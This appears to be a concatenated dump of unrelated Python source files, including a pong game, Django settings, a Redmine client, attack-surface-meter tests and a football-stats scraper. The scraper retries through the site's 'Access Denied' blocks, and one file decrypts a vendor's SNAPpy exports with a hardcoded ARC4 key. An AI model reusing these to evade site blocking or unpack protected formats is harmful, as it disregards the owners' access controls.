1.77, 1.60, 2.00, 1.00, 2.19, 1.51, 2.27, 1.07, 2.17, 1.13, 1.58, 0.71, 1.45, -9.99, 1.01, 0.52, 1.12, 0.28, 1.14, 0.51, 0.93, 0.00, 1.08, 0.06, 0.88, -0.17, 1.11, 0.23, 1.45, 1.38, 1.64, 1.01, 1.13, 0.90, 2.00, 0.65, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, 0.06, -9.99, -0.52, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99 ] sol[0] = 1. else: #a combination of meteoritic/photospheric abundances from Asplund et al. 2009 #chosen for the Husser et al. (2013) Phoenix model atmospheres sol = [ 12.00, 10.93, 3.26, 1.38, 2.79, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.08, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.50, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.36, 2.87, 2.21, 2.58, 1.46, 1.88, -9.99, 1.75, 1.06, 1.65, 1.20, 1.71, 0.76, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -9.99, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.92, 0.10, 0.85, -0.12, 0.65, 0.26, 1.40, 1.38, 1.62, 0.80, 1.17, 0.77, 2.04, 0.65, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, 0.06, -9.99, -0.54, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99, -9.99 ] sol[0] = 1. for i in range(len(sol)-1): sol[i+1] = 10.**(sol[i+1]-12.0) return (symbol,mass,sol)
2.328125
2
app/blueprints/sample_h5_api/v_user.py
lvyaoo/wx-open-project
0
12789875
<reponame>lvyaoo/wx-open-project # -*- coding: utf-8 -*- from flask import g from . import bp_sample_h5_api from .decorators import login_required from ...api_utils import * @bp_sample_h5_api.route('/current_user/', methods=['GET']) @login_required def get_current_user(): """ 获取当前微信用户详情 :return: """ data = { 'wx_user': g.user.to_dict(g.fields) } return api_success_response(data)
2.109375
2
setup.py
WangTingZheng/explorer
17
12789876
import setuptools with open("README.md", "r", encoding="UTF-8") as fh: long_description = fh.read() setuptools.setup( name="file-explorer", version="0.0.0", author="WangTingZheng", author_email="<EMAIL>", description="A simple python cli file browser", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/WangTingZheng/explorer", packages=setuptools.find_packages(), install_requires=["pick"], entry_points={"console_scripts": ["explorer = explorer.command:main"]}, )
1.585938
2
warbend/game/mount_and_blade/native/__init__.py
int19h/warbend
4
12789877
from __future__ import absolute_import, division, print_function import sys from ....data import root, parent, transaction from ...module_system import * from ... import save from .. import records from .slots import Slots globals().update(records(Slots())) def load(*args, **kwargs): from ... import load return load(sys.modules[__name__], *args, **kwargs)
1.828125
2
external/simpleWpsApp/pse_server/flow/urls.py
Ueda-Ichitaka/workflowPSE
0
12789878
<gh_stars>0 from django.conf.urls import url, include from . import views urlpatterns = [ # Serve web app url(r'^$', views.index), # Service api url(r'^service/$', views.ServiceList.as_view()), url(r'^service/(?P<pk>[0-9]+)/$', views.ServiceDetail.as_view()), # Service Provider api url(r'^service-provider/$', views.ServiceProviderList.as_view()), url(r'^service-provider/(?P<pk>[0-9]+)/$', views.ServiceProviderDetail.as_view()), # Auth url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), ]
1.75
2
trik/ya/regularization.py
hellotrik/trik
0
12789879
from ..sheng import V,Pow,Mul,ReduceSum,Abs class RegularizationLayer: def regularization_term(self, *args, **kwargs): pass class RegularizationL1(RegularizationLayer): @staticmethod def regularization_term(target_symbol: V, decay: float): return target_symbol(Abs())(ReduceSum())(Mul(),decay) class RegularizationL2(RegularizationLayer): @staticmethod def regularization_term(target_symbol: V, decay: float): return target_symbol(Pow(),2)(ReduceSum())(Pow(),0.5)(Mul(),decay) regularization_l1 = RegularizationL1.regularization_term regularization_l2 = RegularizationL2.regularization_term regularization_map = { 'l1': RegularizationL1, 'l2': RegularizationL2, } def register_regularization(name: str, regularization: RegularizationLayer): regularization_map[name.lower()] = regularization class Regularization: def __init__(self, name: str, *args, **kwargs): self.__name = name.lower() self.__regularization = None if self.__name in regularization_map: self.__regularization = regularization_map[self.__name](*args, **kwargs) else: raise ValueError('No such regularization: {}'.format(name)) def regularization_layer(self): return self.__regularization
2.875
3
task_0/3_euclidean_distance.py
Shobuj-Paul/Strawberry-Stacker
0
12789880
#Given 2 points (x1,y1) and (x2,y2), where x1, x2 are x-coordinates #and y1, y2 are y-coordinates of the points. #Your task is to compute the Euclidean distance between them. #The distance computed should be precise up to 2 decimal places. from math import sqrt def compute_distance(x1, y1, x2, y2): distance = sqrt((x2-x1)**2 + (y2-y1)**2) return distance def main(): T = int(input()) d = [] for i in range(0,T): (x1, y1, x2, y2) = map(int, input().split(" ")) d.append(compute_distance(x1,y1,x2,y2)) for i in range(0,T): print("Distance: %.2f" %d[i]) if __name__=='__main__': try: main() except: pass
3.921875
4
solutions/0136.single-number/single-number.py
cocobear/LeetCode-in-Python
0
12789881
# # @lc app=leetcode id=136 lang=python3 # # [136] Single Number # from __future__ import annotations # @lc code=start class Solution: def singleNumber(self, nums: List[int]) -> int: res = nums[0] for i in nums[1:]: res ^= i return res tests = [ ([2,2,1], 1), ([4,1,2,1,2], 4) ] # @lc code=end
3.109375
3
signalr/hubs/__init__.py
talboren/signalr-client-py
58
12789882
from ._hub import Hub
1.117188
1
pygame/pong.py
sheepman39/school
3
12789883
<filename>pygame/pong.py<gh_stars>1-10 import pygame, random, sys # this is based off of a tutorial from https://www.youtube.com/watch?v=Qf3-aDXG8q4 # starts pygame pygame.mixer.pre_init(44100, -16, 2, 512) pygame.init() clock = pygame.time.Clock() # main window screen_width = 1280 screen_height = 960 screen = pygame.display.set_mode((screen_width, screen_height)) # gives the display its title pygame.display.set_caption("Pong") # game rectangles ball = pygame.Rect(screen_width/2 - 15, screen_height/2 - 15, 30, 30) player = pygame.Rect(screen_width - 20, screen_height/2 - 70, 10,140) opponent = pygame.Rect(10, screen_height/2 - 70, 10, 140) # color variable light_grey = (200,200,200) ball_speed = [7 * random.choice((1,-1)), 7 * random.choice((1,-1))] player_speed = 0 opponent_speed = 7 def ball_animation(): global ball_speed, player_score, opponent_score, score_time # changes ball speed ball.x += ball_speed[0] ball.y += ball_speed[1] ball_speed = list(ball_speed) # this changes the direction upon collision if ball.top <= 0 or ball.bottom >= screen_height: pygame.mixer.Sound.play(pong_sound) ball_speed[1] = ball_speed[1] * -1 if ball.left <= 0: pygame.mixer.Sound.play(score_sound) player_score += 1 score_time = pygame.time.get_ticks() elif ball.right >= screen_width: pygame.mixer.Sound.play(score_sound) opponent_score += 1 score_time = pygame.time.get_ticks() if ball.colliderect(player) and ball_speed[0] > 0: pygame.mixer.Sound.play(pong_sound) if abs(ball.right - player.left) < 10: ball_speed[0] = ball_speed[0] * -1 elif abs(ball.bottom - player.top) < 10 and ball_speed[1] > 0: ball_speed[1] *= -1 elif abs(ball.top - player.bottom) < 10 and ball_speed[1] < 0: ball_speed[1] *= -1 elif ball.colliderect(opponent) and ball_speed[0] < 0: pygame.mixer.Sound.play(pong_sound) if abs(ball.left - opponent.right) < 10: ball_speed[0] = ball_speed[0] * -1 elif abs(ball.bottom - opponent.top) < 10 and ball_speed[1] > 0: ball_speed[1] *= -1 elif abs(ball.top - oppponent.bottom) < 10 and ball_speed[1] < 0: ball_speed[1] *= -1 def player_animation(): # moving of the players player.y += player_speed # checks for boundaries if player.top <= 0: player.top = 0 if player.bottom >= screen_height: player.bottom = screen_height def opponent_animation(): if opponent.top < ball.y: opponent.top += opponent_speed if opponent.bottom > ball.y: opponent.bottom -= opponent_speed # checks for boundaries if opponent.top <= 0: opponent.top = 0 if opponent.bottom >= screen_height: opponent.bottom = screen_height def ball_restart(): global ball_speed, score_time ball.center = (screen_width/2, screen_height/2) current_time = pygame.time.get_ticks() if current_time - score_time < 700: number_three = game_font.render("3", True, light_grey) screen.blit(number_three, (screen_width/2 - 10, screen_height/2 + 20)) elif 700 < current_time - score_time < 1400: number_two = game_font.render("2", True, light_grey) screen.blit(number_two, (screen_width/2 - 10, screen_height/2 + 20)) elif 1400 < current_time - score_time < 2100: number_one = game_font.render("1", True, light_grey) screen.blit(number_one, (screen_width/2 - 10, screen_height/2 + 20)) if current_time - score_time < 2100: ball_speed = [0, 0] else: ball_speed = (7 * random.choice((1,-1)), 7 * random.choice((1,-1))) score_time = None # score variables player_score = 0 opponent_score = 0 # text variables game_font = pygame.font.Font("freesansbold.ttf", 32) # Score timer score_time = True # Sound pong_sound = pygame.mixer.Sound("./pygame/pong.ogg") score_sound = pygame.mixer.Sound("./pygame/score.ogg") while True: # handles input for event in pygame.event.get(): # checks if the event is quit if event.type == pygame.QUIT: # using both of these ensures that it is closed reliably pygame.quit() # sys exit closes the entire program sys.exit() if event.type == pygame.KEYDOWN: if event.key == pygame.K_DOWN: player_speed += 7 if event.key == pygame.K_UP: player_speed -= 7 if event.type == pygame.KEYUP: if event.key == pygame.K_DOWN: player_speed -= 7 if event.key == pygame.K_UP: player_speed += 7 ball_animation() player_animation() opponent_animation() # background color screen.fill((0,0,0)) # draws the players and the ball pygame.draw.rect(screen,light_grey,player) pygame.draw.rect(screen,light_grey,opponent) pygame.draw.ellipse(screen, light_grey, ball) # to draw a line <screen>, <color> <x1,y1> <x2,y2> pygame.draw.aaline(screen, light_grey, (screen_width/2, 0), (screen_width/2,screen_height)) if score_time: ball_restart() # draws the score player_text = game_font.render(f"{player_score}", True, light_grey) screen.blit(player_text, (660, 470)) opponent_text = game_font.render(f"{opponent_score}", True, light_grey) screen.blit(opponent_text, (600, 470)) # .flip draws the picture from everything in the loop pygame.display.flip() # this limits how fast the loop runs, 60 hz clock.tick(60)
3.5625
4
py/stats_scanner.py
MarcGumowski/WorldCup2018TrueSkill
2
12789884
# ---------------------------------------------------------------------------- # # World Cup: Stats scanner # Ver: 0.01 # ---------------------------------------------------------------------------- # # # Code by <NAME> # # ---------------------------------------------------------------------------- # import os import numpy as np import pandas as pd import re from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from selenium.webdriver.firefox.options import Options from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from time import sleep os.chdir("/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA") ''' browser = webdriver.Firefox() browser.get("https://www.whoscored.com/Regions/247/Tournaments/36/Seasons/5967/Stages/15737/Show/International-FIFA-World-Cup-2018") sleep(3) base_url = 'https://www.whoscored.com' def get_countries_links(browser): return [team.get_attribute('href') for team in browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')] countries_link = set() countries_link.update(get_countries_links(browser)) browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')[0].get_attribute('href') # click next page browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click() sleep(1) countries_link.update(get_countries_links(browser)) # click next page browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click() sleep(1) countries_link.update(get_countries_links(browser)) #countries_link player_link = dict() for country_link in countries_link: browser.get(country_link) sleep(1) team = browser.find_element_by_xpath('//span[@class="team-header-name"]') player_link[team.text] = dict() for player in browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//tbody//tr//a'): player_link[team.text][player.text] = player.get_attribute('href') np.save("Data/player_link.npy", player_link) ''' def detect_element(browser, element_id, by_what = By.ID): # Simplify the detection of an element in the browser element_present = EC.presence_of_element_located((by_what, element_id)) try: WebDriverWait(browser, 5, poll_frequency = .1).until(element_present) return True except TimeoutException as e: return False player_link = np.load("Data/player_link.npy").item() # will delete nan from already_loaded already_loaded = rating_dict.copy() for team in rating_dict.keys(): for player in rating_dict[team]: if pd.isnull(rating_dict[team][player]): already_loaded[team].pop(player, None) #caps = DesiredCapabilities().FIREFOX caps = DesiredCapabilities.CHROME caps["pageLoadStrategy"] = "none" #rating_dict = {team:{} for team in player_link.keys()} browser = webdriver.Chrome(desired_capabilities = caps)#Firefox(capabilities=caps) for team in player_link.keys(): for player in player_link[team].keys(): if player in already_loaded[team].keys(): continue while True: try: browser.get(player_link[team][player]) wait = WebDriverWait(browser, 20) wait.until(EC.presence_of_element_located((By.XPATH, '//table[@id="top-player-stats-summary-grid"]'))) browser.execute_script("window.stop();") try: rating_dict[team][player] = browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//td[@class="rating"]')[-1].text print(rating_dict[team][player]) break except IndexError: try: iframe = browser.find_element_by_xpath('//iframe') browser.switch_to_frame(iframe) browser.find_element_by_xpath('//p[contains(text(), "Access Denied")]') sleep(5) except NoSuchElementException: rating_dict[team][player] = np.nan except TimeoutException: sleep(5) np.save("Data/rating_dict.npy", rating_dict) rating_dict['Saudi Arabia']
2.265625
2
src/unsnap/decryptor.py
raschle/SnappyDecompiler
1
12789885
<reponame>raschle/SnappyDecompiler import math, bz2, os from snaplib.ppcrypto import ARC4 # _SNAPPY_EXPORT_KEY encoder = ARC4("SynapseExport" + str(math.pi)) def decryptSnapSpy(file): (filename_and_path, extension) = os.path.splitext(file) with open(file, "rb") as binary_file: data = binary_file.read() exportString = encoder.decrypt(data) decomp_data = bz2.decompress(exportString) newFileName = "{0}.unspy".format(filename_and_path) with open(newFileName, "wb") as unspy: unspy.write(decomp_data) return newFileName
2.875
3
src/tools/dev/redmine/pyrmine/src/Connection.py
eddieTest/visit
0
12789886
<filename>src/tools/dev/redmine/pyrmine/src/Connection.py<gh_stars>0 #!/usr/bin/env python # # file: Connection.py # author: <NAME> <<EMAIL>> # created: 6/1/2010 # purpose: # Provides a 'Connection' class that interacts with a redmine instance to # extract results from redmine queries. # import urllib2,urllib,csv,getpass,warnings from collections import namedtuple from Issue import * try: import pyPdf except: print "Warning: pyrmine requires the 'pyPdf' ", print "module for full pdf functionality." class Connection(object): def __init__(self,base_url): """ Creates a redmine connection object to redmine instance at the given url. """ self.urls = {} if base_url[-1] == "/": base_url = base_url[:-1] self.urls["base"] = base_url self.urls["login"] = "%s/login/" % base_url self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) def login(self,uname=None,passwd=None): """ Login handshake. If username & passwd are not given this function asks for them via stdout/stdin. """ if uname is None: uname = raw_input("username:") if passwd is None: passwd = getpass.getpass("password:") f = self.opener.open(self.urls["login"]) data = f.read() f.close() split_key = '<input name="authenticity_token" type="hidden" value="' data = data.split(split_key)[1] atok= data.split('" />')[0] params = dict(username=uname, password=<PASSWORD>, authenticity_token=atok) params = urllib.urlencode(params) f = self.opener.open(self.urls["login"], params) data = f.readlines() f.close() def open_base_url(self,url): """ Constructs and opens an url relative to the base of this connection. """ url = "%s/%s" % (self.urls["base"],url) return self.opener.open(url) def open_project_url(self,project,url): """ Constructs and opens a project url relative to the base of this connection. """ url = "%s/projects/%s/%s" % (self.urls["base"] ,project) return self.opener.open(url) def fetch_issues(self,project,query_id=-1,iclass=Issue): """ Executes a query and returns a set of Issues holding the results. You can specify which class is used to wrap returned issues via 'iclass'. """ issues_url = "%s/projects/%s/issues.csv" % (self.urls["base"] ,project) if int(query_id) >= 0: params = {} params['query_id'] = str(query_id) issues_url += "?" + urllib.urlencode(params) print "[executing query: %s]" % issues_url f = self.opener.open(issues_url) csv_reader = csv.reader(f) issues = [ row for row in csv_reader] fields = [self.__format_field_name(val) for val in issues[0]] issues = issues[1:] print "[query returned %d issues]" % len(issues) IssueTuple = namedtuple("Issue",fields) issues = [iclass(IssueTuple(*i),self) for i in issues] return fields,issues def save_query_pdf(self,project,query_id,output_file): """ Collects pdfs of all issues returned by a query and combines them into a single output pdf. """ fields,issues = self.fetch_issues(project,query_id) nissues = len(issues) if nissues == 0: print "[query returned no issues -", print " skipping creation of '%s']" % output_file return # try to ingore some deprecation warnings from pyPdf with warnings.catch_warnings(): warnings.simplefilter("ignore") opdf = pyPdf.PdfFileWriter() for i in issues: print "[downloading issue %s]" % i.id idata = i.fetch_pdf_buffer() ipdf = pyPdf.PdfFileReader(idata) for p in range(ipdf.numPages): opdf.addPage(ipdf.getPage(p)) print "[creating %s]" % output_file opdf.write(file(output_file,"wb")) def __format_field_name(self,name): """ Helper that makes sure field names comply w/ rules required for creating a 'namedtuple' object. """ name = name.lower().replace(" ","_") if name == "#": name = "id" name = name.replace("%","percent") return name
2.75
3
tests/integration_tests/conftest.py
TheCodeSummoner/dof-discord-bot
2
12789887
""" Configuration module containing pytest-specific hooks. """ import os import logging from . import helpers from _pytest.config import Config as PyTestConfig from dof_discord_bot.src.logger import Log from dof_discord_bot.src import logger def _reconfigure_logging(): """ Helper function used to redirect all logging into the tests-specific log folder. Accesses the private method of `logger` to avoid repeating the code. """ # Clear existing logs for file_name in os.listdir(helpers.LOG_DIR): if file_name.endswith(".log"): os.remove(os.path.join(helpers.LOG_DIR, file_name)) # noinspection PyProtectedMember logger._configure(log_directory=helpers.LOG_DIR) Log._logger = logging.getLogger("dof-discord-bot") Log.info("Logging has been reconfigured") def pytest_configure(config: PyTestConfig): """ Configuration hook which reconfigures the logging and calls the global setup function. """ _reconfigure_logging() helpers.setup() Log.info("Pytest configuration hook finished successfully") def pytest_unconfigure(config: PyTestConfig): """ Configuration hook which calls the global teardown function. """ helpers.teardown() Log.info("Pytest unconfiguration hook finished successfully") # An explicit "kill" of current process to ensure clean exit in case of errors when stopping the code os._exit(0)
2.515625
3
settings.py
psf/bpo-rietveld
0
12789888
<reponame>psf/bpo-rietveld # Django settings for django_gae2django project. # NOTE: Keep the settings.py in examples directories in sync with this one! import os, ConfigParser, re, subprocess DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( # ('<NAME>', '<EMAIL>'), ) MANAGERS = ADMINS _c = ConfigParser.ConfigParser({'password':'', 'port':''}) _c.read(os.path.dirname(__file__)+"/../config.ini") TRACKER_COOKIE_NAME='roundup_session_'+re.sub('[^a-zA-Z]', '', _c.get('tracker','name')) DATABASE_ENGINE = 'postgresql_psycopg2' DATABASE_NAME = _c.get('rdbms', 'name') DATABASE_USER = _c.get('rdbms', 'user') DATABASE_PASSWORD = _c.get('rdbms', 'password') DATABASE_HOST = _c.get('rdbms', 'host') DATABASE_PORT = _c.get('rdbms', 'port') # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'Europe/Amsterdam' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # Absolute path to the directory that holds media. # Example: "/home/media/media.lawrence.com/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash if there is a path component (optional in other cases). # Examples: "http://media.lawrence.com", "http://example.com/media/" MEDIA_URL = '/review/static/' # URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a # trailing slash. # Examples: "http://foo.com/media/", "/media/". ADMIN_MEDIA_PREFIX = '/media/' # Make this unique, and don't share it with anybody. SECRET_KEY = _c.get('django', 'secret_key') # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.load_template_source', 'django.template.loaders.app_directories.load_template_source', # 'django.template.loaders.eggs.load_template_source', ) AUTHENTICATION_BACKENDS = ('roundup_helper.middleware.UserBackend',) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'roundup_helper.middleware.LookupRoundupUser', 'gae2django.middleware.FixRequestUserMiddleware', # Keep in mind, that CSRF protection is DISABLED in this example! 'rietveld_helper.middleware.DisableCSRFMiddleware', 'rietveld_helper.middleware.AddUserToRequestMiddleware', 'django.middleware.doc.XViewMiddleware', ) TEMPLATE_CONTEXT_PROCESSORS = ( 'django.core.context_processors.auth', # required by admin panel 'django.core.context_processors.request', ) ROOT_URLCONF = 'roundup_helper.urls' TEMPLATE_DIRS = ( os.path.join(os.path.dirname(__file__), 'templates'), ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.admin', 'gae2django', 'rietveld_helper', 'codereview', ) AUTH_PROFILE_MODULE = 'codereview.Account' LOGIN_REDIRECT_URL = '/' #RIETVELD_INCOMING_MAIL_ADDRESS = ('<EMAIL>' % appid) RIETVELD_INCOMING_MAIL_MAX_SIZE = 500 * 1024 # 500K RIETVELD_REVISION = '<unknown>' try: p = subprocess.Popen(['hg','identify','-i', os.path.dirname(__file__)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() RIETVELD_REVISION = out.strip() p.wait() del p, out, err except: pass UPLOAD_PY_SOURCE = os.path.join(os.path.dirname(__file__), 'upload.py') # Default values for patch rendering DEFAULT_CONTEXT = 10 DEFAULT_COLUMN_WIDTH = 80 MIN_COLUMN_WIDTH = 3 MAX_COLUMN_WIDTH = 2000 # This won't work with gae2django. RIETVELD_INCOMING_MAIL_ADDRESS = None
1.921875
2
tests/test_utilities.py
andymeneely/attack-surface-metrics
16
12789889
import copy import os import unittest import networkx as nx from attacksurfacemeter import utilities from attacksurfacemeter.call import Call from attacksurfacemeter.call_graph import CallGraph from attacksurfacemeter.environments import Environments from attacksurfacemeter.loaders.cflow_loader import CflowLoader from attacksurfacemeter.loaders.gprof_loader import GprofLoader class UtilitiesTestCase(unittest.TestCase): def test_fix(self): # Arrange target = CallGraph.from_loader( CflowLoader( os.path.join( os.path.dirname(os.path.realpath(__file__)), 'helloworld/cflow.callgraph.r.mod.txt' ), True ) ) _target = copy.deepcopy(target) reference = CallGraph.from_loader( GprofLoader( os.path.join( os.path.dirname(os.path.realpath(__file__)), 'helloworld/gprof.callgraph.txt' ) ) ) expected = { 'before': Call('GreeterSayHi', '', Environments.C), 'after': Call('GreeterSayHi', './src/helloworld.c', Environments.C) } # Act utilities.fix(target, using=reference) actual = { 'before': next( i for (i, _) in _target.nodes if i.function_name == 'GreeterSayHi' ), 'after': next( i for (i, _) in target.nodes if i.function_name == 'GreeterSayHi' ) } # Assert self.assertEqual(expected['before'], actual['before']) self.assertEqual(expected['after'], actual['after']) # Asserting if node attributes got carried over self.assertCountEqual( [ attrs for (i, attrs) in _target.nodes if i == expected['before'] ], [ attrs for (i, attrs) in target.nodes if i == expected['after'] ] ) # Asserting if edge attributes got carried over self.assertCountEqual( [ attrs for (i, j, attrs) in _target.edges if i == expected['before'] or j == expected['before'] ], [ attrs for (i, j, attrs) in target.edges if i == expected['after'] or j == expected['after'] ], ) # Asserting if OTHER nodes and their attributes got carried over self.assertCountEqual( [ (i, attrs) for (i, attrs) in _target.nodes if i != expected['before'] ], [ (i, attrs) for (i, attrs) in target.nodes if i != expected['after'] ] ) # Asserting if OTHER edges and their attributes got carried over self.assertCountEqual( [ (i, j, attrs) for (i, j, attrs) in _target.edges if i != expected['before'] and j != expected['before'] ], [ (i, j, attrs) for (i, j, attrs) in target.edges if i != expected['after'] and j != expected['after'] ], ) def test_get_fragments(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.DiGraph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h') ]) expected = [None] * 4 expected[0] = nx.DiGraph() expected[0].add_nodes_from(['a', 'b', 'c', 'd']) expected[0].add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd') ]) expected[1] = nx.DiGraph() expected[1].add_nodes_from(['e', 'f', 'g']) expected[1].add_edges_from( [('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f')] ) expected[2] = nx.DiGraph() expected[2].add_nodes_from(['h', 'i']) expected[2].add_edges_from([('i', 'h'), ('h', 'i')]) expected[3] = nx.DiGraph() expected[3].add_nodes_from(['j']) # Act actual = utilities.get_fragments(graph) actual.sort(key=lambda i: len(i.nodes()), reverse=True) # Assert self.assertEqual(len(expected), len(actual)) for i in range(4): self.assertCountEqual(expected[i].nodes(), actual[i].nodes()) self.assertCountEqual(expected[i].edges(), actual[i].edges()) def test_get_fragments_for_undirected(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.Graph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'a'), ('e', 'f'), ('f', 'g'), ('h', 'i') ]) # Assert self.assertRaises(Exception, utilities.get_fragments, graph) def test_get_largest_fragment(self): # Arrange # a -- b e -- f -- g # | | # | | # d -- c h -- i j graph = nx.DiGraph() graph.add_nodes_from( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'] ) graph.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h') ]) expected = nx.DiGraph() expected.add_nodes_from(['a', 'b', 'c', 'd']) expected.add_edges_from([ ('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'), ('d', 'c'), ('d', 'a'), ('a', 'd') ]) # Act actual = utilities.get_largest_fragment(utilities.get_fragments(graph)) # Assert self.assertCountEqual(expected.nodes(), actual.nodes()) self.assertCountEqual(expected.edges(), actual.edges()) def test_get_node_attrs(self): # Scenario: main -- printf (cflow) # Arrange source = 'cflow' caller = Call('main', 'main.c', Environments.C) callee = Call('printf', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- printf (gprof) # Arrange source = 'gprof' caller = Call('main', 'main.c', Environments.C) callee = Call('printf', '', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- None (gprof) # Arrange source = 'gprof' caller = Call('main', 'main.c', Environments.C) callee = None # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNone(callee_attrs) # Scenario: main -- validate* (cflow) # * Designed defense # Arrange source = 'cflow' defenses = [Call('validate', 'utils.c', Environments.C)] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, defenses, list() ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in caller_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes self.assertIsNotNone(callee_attrs) self.assertTrue('tested' not in callee_attrs) self.assertTrue('defense' in callee_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertEqual(callee_attrs['frequency'], 1) # Scenario: main -- validate* (cflow) # * Vulnerable # Arrange source = 'cflow' vulnerabilities = [Call('validate', 'utils.c', Environments.C)] caller = Call('main', 'main.c', Environments.C) callee = Call('validate', 'utils.c', Environments.C) # Act (caller_attrs, callee_attrs) = utilities.get_node_attrs( source, caller, callee, list(), vulnerabilities ) # Assert # Caller Attributes self.assertTrue('tested' not in caller_attrs) self.assertTrue('defense' not in callee_attrs) self.assertTrue('vulnerable' not in caller_attrs) self.assertTrue('dangerous' not in caller_attrs) self.assertTrue('entry' not in caller_attrs) self.assertTrue('exit' not in caller_attrs) self.assertTrue('frequency' not in caller_attrs) # Callee Attributes 